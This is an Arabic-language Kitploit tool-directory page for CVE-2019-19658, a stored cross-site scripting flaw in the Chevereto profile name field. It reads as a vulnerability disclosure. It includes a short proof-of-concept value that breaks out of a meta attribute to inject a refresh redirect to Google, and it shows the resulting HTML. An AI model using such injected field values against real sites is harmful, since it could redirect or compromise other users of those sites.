Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2019-19658 — Chevereto: ثغرة XSS مخزنة في صفحة الملف الشخصي - 1.0.0 - 1.1.4 Free, <= 3.13.5 Core | Kitploit
أدوات/GitHubGitHub/jra89/cve-2019-19658
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبجمع المعلوماتاختبار الاختراق
GitHubjra89/cve-2019-19658

CVE-2019-19658

Chevereto: ثغرة XSS مخزنة في صفحة الملف الشخصي - 1.0.0 - 1.1.4 Free, <= 3.13.5 Core

عرض المستودع
1منذ 6 سنواتلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2019-19658

ثغرة XSS مخزنة في Chevereto في صفحة الملف الشخصي - 1.0.0 - 1.1.4 Free, <= 3.13.5 Core. يمكن لمستخدم عادي إدخال HTML وسكربت في اسم ملفه الشخصي وسيتم تنفيذهما على صفحة ملفه الشخصي.

root@kitploit:~
/settings/profile

الاسم:

root@kitploit:~
0;https://www.google.se" http-equiv="refresh" data="

النتيجة على صفحة الملف الشخصي، والتي ستعيد التوجيه إلى Google:

root@kitploit:~
<meta name="twitter:title" content="0;https://www.google.com" http-equiv="refresh" data=" (admin)">



يقوم المستخدم المسجّل بحقن بعض السكربت في حقل الاسم، وفي هذه الحالة لإعادة توجيه المستخدم إلى Google



يدخل شخص ما إلى ملف /test الشخصي ومن ثم يتم إعادة توجيهه

تنزيل الأداة